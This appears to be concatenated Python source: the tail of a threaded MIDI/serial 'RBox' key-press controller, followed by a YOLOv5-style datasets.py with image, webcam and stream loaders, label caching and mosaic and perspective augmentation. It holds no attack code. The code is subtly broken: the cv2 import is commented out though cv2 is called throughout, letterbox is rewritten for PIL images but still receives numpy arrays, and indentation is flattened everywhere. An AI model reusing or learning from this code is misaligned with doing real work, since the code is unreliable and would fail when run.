self.dataengine.daemon = True
self.dataengine.start ()
#start engines for handling input
self.rgbengine1 = threading.Thread(target=self.run_rgb_engine)
self.rgbengine1.daemon = True
self.rgbengine1.start ()
self.rgbengine = threading.Thread(target=self.run_rgb_engine)
self.rgbengine.daemon = True
self.rgbengine.start ()
#start engine for processing the query
self.queryengine = threading.Thread(target=self.run_query_engine)
self.queryengine.daemon = True
self.queryengine.start ()
def stop(self):
self.__running = False
self.dataengine .join()
self.rgbengine .join()
self.rgbengine1 .join()
self.queryengine.join()
class RBoxTilt:
def __init__(self, port:str):
self.ahk = AHK(executable_path=resource_path("AutoHotkeyU64.exe"))
self.pi = midi_driver.SerialController(port)
self.__running = False
with open("tiltconfig.json", "r") as file:
self.config = json.loads(file.read())
def run_tilt_engine(self):
printd("STARTING TILT ENGINE")
while True:
if not self.__running: break
button = self.pi.read_button()
if(button != None):
printd(f"MOTION TRIGGER: {button}")
try:
key = self.config[button]
if(len(key) == 1):
printd(f"\t>> SINGLE ACTION {key}")
self.ahk.key_press(key[0])
else:
pyautogui.hotkey(*key)
printd(f"\t>> DOUBLE ACTION {key}")
except:
pass
printd("STOPPING TILT ENGINE")
def start(self):
self.__running = True
self.tiltengine = threading.Thread(target=self.run_tilt_engine)
self.tiltengine.daemon = True
self.tiltengine.start ()
def stop(self):
self.__running = False
self.tiltengine .join()
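# Rough usage sketch (hypothetical port names and device indices, not taken
# from the original project):
#
#   task = RBoxTask(port="COM3", midiout=1, midiin=0)
#   task.start(config)   # config: list of [status, note, velocity] hex-string triples
#   ...
#   task.stop()
#
#   tilt = RBoxTilt(port="COM4")
#   tilt.start()
#   ...
#   tilt.stop()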
|
datasets.py
|
import glob
# import cv2
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import torch_distributed_zero_first, xywh2xyxy, xyxy2xywh
help_url = "https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data"
img_formats = [".bmp", ".jpg", ".jpeg", ".png", ".tif", ".tiff", ".dng"]
vid_formats = [".mov", ".avi", ".mp4", ".mpg", ".mpeg", ".m4v", ".wmv", ".mkv"]
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == "Orientation":
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(
path,
imgsz,
batch_size,
stride,
opt,
hyp=None,
augment=False,
cache=False,
pad=0.0,
rect=False,
rank=-1,
world_size=1,
workers=8,
):
    # Make sure only the first process in DDP processes the dataset first, so the following ones can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(
path,
imgsz,
batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank,
)
batch_size = min(batch_size, len(dataset))
nw = min(
[os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]
) # number of workers
sampler = (
torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
)
dataloader = InfiniteDataLoader(
dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn,
) # torch.utils.data.DataLoader()
return dataloader, dataset
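# Usage sketch (hypothetical dataset path and options, not part of this module;
# `opt` only needs a `single_cls` attribute here):
#
#   opt = argparse.Namespace(single_cls=False)
#   loader, dataset = create_dataloader("data/train", imgsz=640, batch_size=16,
#                                       stride=32, opt=opt, hyp=None, augment=True,
#                                       rank=-1, world_size=1, workers=8)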
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
"""Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, "batch_sampler", _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
"""Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
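# Sketch of the intended effect (based on the docstrings above, illustration
# only): because the batch sampler repeats forever, a single iterator is built
# once in __init__ and the DataLoader workers stay alive across epochs, e.g.
#
#   loader = InfiniteDataLoader(dataset, batch_size=16, num_workers=4,
#                               collate_fn=LoadImagesAndLabels.collate_fn)
#   for epoch in range(300):
#       for imgs, targets, paths, shapes in loader:   # workers are reused
#           ...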
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if "*" in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, "*.*"))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception("ERROR: %s does not exist" % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = "images"
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, (
"No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s"
% (p, img_formats, vid_formats)
)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = "video"
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(
"video %g/%g (%g/%g) %s: "
% (self.count + 1, self.nf, self.frame, self.nframes, path),
end="",
)
else:
# Read image
self.count += 1
# img0 = cv2.imread(path) # BGR
img0 = Image.open(path).convert("RGB")
assert img0 is not None, "Image Not Found " + path
print("image %g/%g %s: " % (self.count, self.nf, path), end="")
# Padded resize
img = np.array(letterbox(img0, new_shape=self.img_size)[0])
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, np.asarray(img0), self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == "0":
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord("q"): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, "Camera Error %s" % self.pipe
img_path = "webcam.jpg"
print("webcam %g: " % self.count, end="")
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources="streams.txt", img_size=640):
self.mode = "images"
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, "r") as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print("%g/%g: %s... " % (i + 1, n, s), end="")
cap = cv2.VideoCapture(int(s) if s.isnumeric() else s)  # numeric strings are local camera indices
assert cap.isOpened(), "Failed to open %s" % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(" success (%gx%g at %.2f FPS)." % (w, h, fps))
thread.start()
print("") # newline
# check for common shapes
s = np.stack(
[letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0
) # inference shapes
self.rect = (
np.unique(s, axis=0).shape[0] == 1
) # rect inference if all shapes equal
if not self.rect:
print(
"WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams."
)
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord("q"): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
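# Illustrative usage sketch (an assumption added for clarity, not part of the original
# file): LoadStreams yields one stacked batch per iteration, so a detection loop over
# multiple cameras looks roughly like the function below (never called here).
def _example_load_streams():
    dataset = LoadStreams("streams.txt", img_size=640)  # hypothetical streams list
    for sources, img, img0, _ in dataset:
        # img: (num_streams, 3, H, W) RGB array ready for the model,
        # img0: list of the original BGR frames, sources: the stream URLs
        break
    return sources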
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(
self,
path,
img_size=640,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_images=False,
single_cls=False,
stride=32,
pad=0.0,
rank=-1,
):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, "r") as t:
t = t.read().splitlines()
f += [
x.replace("./", parent) if x.startswith("./") else x
for x in t
] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + "*.*")
else:
raise Exception("%s does not exist" % p)
self.img_files = sorted(
[
x.replace("/", os.sep)
for x in f
if os.path.splitext(x)[-1].lower() in img_formats
]
)
except Exception as e:
raise Exception(
"Error loading data from %s: %s\nSee %s" % (path, e, help_url)
)
n = len(self.img_files)
assert n > 0, "No images found in %s. See %s" % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = (
self.augment and not self.rect
) # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
sa, sb = (
os.sep + "images" + os.sep,
os.sep + "labels" + os.sep,
) # /images/, /labels/ substrings
self.label_files = [
x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], ".txt")
for x in self.img_files
]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + ".cache" # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache["hash"] != get_hash(
self.label_files + self.img_files
): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = (
np.ceil(np.array(shapes) * img_size / stride + pad).astype(int)
* stride
)
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = (
0,
0,
0,
0,
0,
) # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, "> 5 label columns: %s" % file
assert (l >= 0).all(), "negative labels: %s" % file
assert (l[:, 1:] <= 1).all(), (
"non-normalized or out of bounds coordinate labels: %s" % file
)
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1e4:
if ns == 0:
create_folder(path="./datasubset")
os.makedirs("./datasubset/images")
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open("./datasubset/images.txt", "a") as f:
f.write(self.img_files[i] + "\n")
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = "%s%sclassifier%s%g_%g_%s" % (
p.parent.parent,
os.sep,
os.sep,
x[0],
j,
p.name,
)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(
b[[0, 2]], 0, w
) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(
f, img[b[1] : b[3], b[0] : b[2]]
), "Failure extracting classifier boxes"
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = (
"Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)"
% (cache_path, nf, nm, ne, nd, n)
)
if nf == 0:
s = "WARNING: No labels found in %s. See %s" % (
os.path.dirname(file) + os.sep,
help_url,
)
print(s)
assert not augment, "%s. Can not train without labels." % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc="Caching images")
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(
self, i
) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = "Caching images (%.1fGB)" % (gb / 1e9)
def cache_labels(self, path="labels.cache"):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(
zip(self.img_files, self.label_files),
desc="Scanning images",
total=len(self.img_files),
)
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), "image size <10 pixels"
if os.path.isfile(label):
with open(label, "r") as f:
l = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print("WARNING: %s: %s" % (img, e))
x["hash"] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp["mosaic"]
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp["mixup"]:
img2, labels2 = load_mosaic(
self, random.randint(0, len(self.labels) - 1)
)
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = (
self.batch_shapes[self.batch[index]] if self.rect else self.img_size
) # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = (
ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]
) # pad width
labels[:, 2] = (
ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]
) # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(
img,
labels,
degrees=hyp["degrees"],
translate=hyp["translate"],
scale=hyp["scale"],
shear=hyp["shear"],
perspective=hyp["perspective"],
)
# Augment colorspace
augment_hsv(img, hgain=hyp["hsv_h"], sgain=hyp["hsv_s"], vgain=hyp["hsv_v"])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp["flipud"]:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp["fliplr"]:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
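# Illustrative usage sketch (an assumption, not part of the original file): wiring the
# dataset above into a torch DataLoader with its custom collate_fn. The dataset path is
# hypothetical.
def _example_dataloader():
    from torch.utils.data import DataLoader
    dataset = LoadImagesAndLabels("data/train.txt", img_size=640, batch_size=16, augment=False)
    loader = DataLoader(dataset, batch_size=16, collate_fn=LoadImagesAndLabels.collate_fn)
    for imgs, targets, paths, shapes in loader:
        # imgs: (bs, 3, H, W) uint8 tensor; targets: (n, 6) rows of [image_index, cls, x, y, w, h]
        break
    return loader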
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, "Image Not Found " + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return (
self.imgs[index],
self.img_hw0[index],
self.img_hw[index],
) # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge(
(cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))
).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
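# Illustrative sketch (an assumption, not part of the original file): augment_hsv()
# modifies the BGR image in place via per-channel look-up tables, so pass a copy when
# the original frame must be preserved.
def _example_augment_hsv():
    img = np.random.randint(0, 255, (64, 64, 3), dtype=np.uint8)
    augment_hsv(img, hgain=0.015, sgain=0.7, vgain=0.4)  # img is modified in place
    return img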
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [
int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border
] # mosaic center x, y
indices = [index] + [
random.randint(0, len(self.labels) - 1) for _ in range(3)
] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full(
(s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8
) # base image with 4 tiles
x1a, y1a, x2a, y2a = (
max(xc - w, 0),
max(yc - h, 0),
xc,
yc,
) # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = (
w - (x2a - x1a),
h - (y2a - y1a),
w,
h,
) # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(
labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]
) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(
img4,
labels4,
degrees=self.hyp["degrees"],
translate=self.hyp["translate"],
scale=self.hyp["scale"],
shear=self.hyp["shear"],
perspective=self.hyp["perspective"],
border=self.mosaic_border,
) # border to remove
return img4, labels4
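# Illustrative note (an assumption, not part of the original file): load_mosaic stitches
# 4 images onto a 2s x 2s canvas around a random centre (xc, yc); after the final
# random_perspective() call with border=mosaic_border the result is cropped back to
# (img_size, img_size, 3), and labels4 holds pixel xyxy boxes on that crop, e.g.
#     img4, labels4 = load_mosaic(dataset, index=0)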
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[: round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(
random.uniform(0, w - bw)
) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(
img,
new_shape=(640, 640),
color=(114, 114, 114),
auto=True,
scaleFill=False,
scaleup=True,
):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
# shape = img.shape[:2] # current shape [height, width]
shape = (img.size[1], img.size[0])
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
# img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
img = img.resize(new_unpad, resample=Image.BILINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
# img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
img = ImageOps.expand(img, (left, top, right, bottom), fill=114)
return img, ratio, (dw, dh)
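# Illustrative sketch (an assumption, not part of the original file): what this PIL-based
# letterbox() returns for a 1280x720 image with the default 640 target and auto=True.
def _example_letterbox():
    im = Image.new("RGB", (1280, 720))  # (width, height)
    out, ratio, (dw, dh) = letterbox(im, new_shape=640)
    # ratio == (0.5, 0.5); the 640x360 resized image is padded up to the next multiple
    # of 32 in height, so dh == 12.0 (24 px split between top and bottom) and dw == 0.0.
    return out, ratio, (dw, dh)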
def random_perspective(
img,
targets=(),
degrees=10,
translate=0.1,
scale=0.1,
shear=10,
perspective=0.0,
border=(0, 0),
):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
